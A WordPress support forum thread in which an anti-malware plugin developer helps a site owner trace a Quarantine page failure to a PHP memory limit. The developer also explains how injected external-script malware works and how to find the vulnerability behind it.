Can’t Clear Quarantined Files

Quick follow up, it did find another plugin related file. I cleaned it, but still see this error, see screenshot: https://nimb.ws/WFblKh

Let me know your thoughts, and thanks again.

It looks like you have thus far used my plugin to remove 73 infections from your site. Detailed records of these prior infections are stored in the Anti-Malware quarantine, but rest assured that there is nothing further that you would need to do there, those records do not correspond to active threat that require further action but rather former infection that have already been cleaned.

It is also clear however that you are unable to load the Quarantine page on your site. While this is not functionally impairing your efforts to clean the site it is still highly important to me that we figure out what is causing this issue so that I can implement any changes that may be needed to correct the specific issue you have encountered. To follow up on Question #2 I will need more info from you to properly troubleshoot the error you have found. Your admin email should have received an email from your site that outline the specific error that was triggered when the Quarantine page was loaded. If you cannot find that error in your email then there should also be an error_log file on the server that records all the PHP error on the site. If you can find the actual error message then please send it directly to me so that I can look into this further for you. It may contain sensitive information that you might not want to post on this public forum so you can email me directly with any details that could help me identify the issue at: eli AT gotmls DOT net

It is a common enough technique that malware injection refer to an external script hosted on another domain, as you have found with the reference to the new2sportnews script. However, the domain in questions in not ultimately responsible for this infection and thus, should not be solely blamed for the malware you found. In fact, in many cases the this same malware may try to place these infected scripts on your own site and then refer to your domain when it injects these malicious links into the code on other sites that are targeted by this same attack, thereby making your site the source of the malware that others find in there code. That is just the nature of these types of infection. Therefore, my Anti-Malware plugin searches your database and the source code on your server looking for malicious patterns like these regardless of the specific domain used to pull up the external scripts. So, you may not ever see the <meta http-equiv=”content-type” content=”text/html; charset=utf-8″></meta>new2sportnews domain mentioned by my plugin when it identifies these threats, even when that is the source that these scripts are currently being loaded from. I hope that answers Question #1.

Thanks for the reply, Eli. Lots to learn here. Site email isn’t working, so I’ll email you directly with some error logs.

As for the other issue, with the infected file coming from the external domain, is there any way to fix that or stop it from happening again?

Cheers!

Matt

Thanks for those error logs. There are tons of error from the slim-seo plugin in there but the only error that related to my plugin is this one at 28-Feb-2023 19:13:27 UTC:

PHP Fatal error: Allowed memory size of 268435456 bytes exhausted

This suggests that the php.ini file on your server has a memory_limit set to 256M and the Quarantine probably need a more memory than that in order to display and rescan each of the files listed in the quarantine.

There is a chance that this error was unrelated to Quarantine at all if it happened at a completely different time, though that is the only error triggered by me plugin. The could be an error from another conflicting plugin that is preventing the quarantine form loading but it would not name my plugin in the log file so the only way to find that is to correlate the timestamps in the log files with the exact times that you tried to render the Quarantine page.

Or you could turn on debugging by adding these lines to your wp-config.php file:
define( 'WP_DEBUG', true );

define( 'WP_DEBUG_LOG', true );

define( 'WP_DEBUG_DISPLAY', false );

define( 'WP_DISABLE_FATAL_ERROR_HANDLER', true );

As for the other issue, with the external scripts that are infected, you can’t do anything about the script itself if it is hosted on another domain which you do not have access to, but you can remove all references to that external script form your site and my plugin should do that for you. And form the 73 items in your Quarantine it sounds like my plugin has already removed a lot of these for you. If these infections are coming back though, you might still have a vulnerability on your site that is being exploited to inject these external references, and that will need to be found and patched. Fist try deactivating and deleting any themes and plugin that you don’t need. If the injections still return after that, then you will need to compare the times of these infections with the activity recorded in your raw access_log files to determine what vulnerable URLs are responsible for this injection and try to link those URLs back to the insecure code that is allowing this exploit.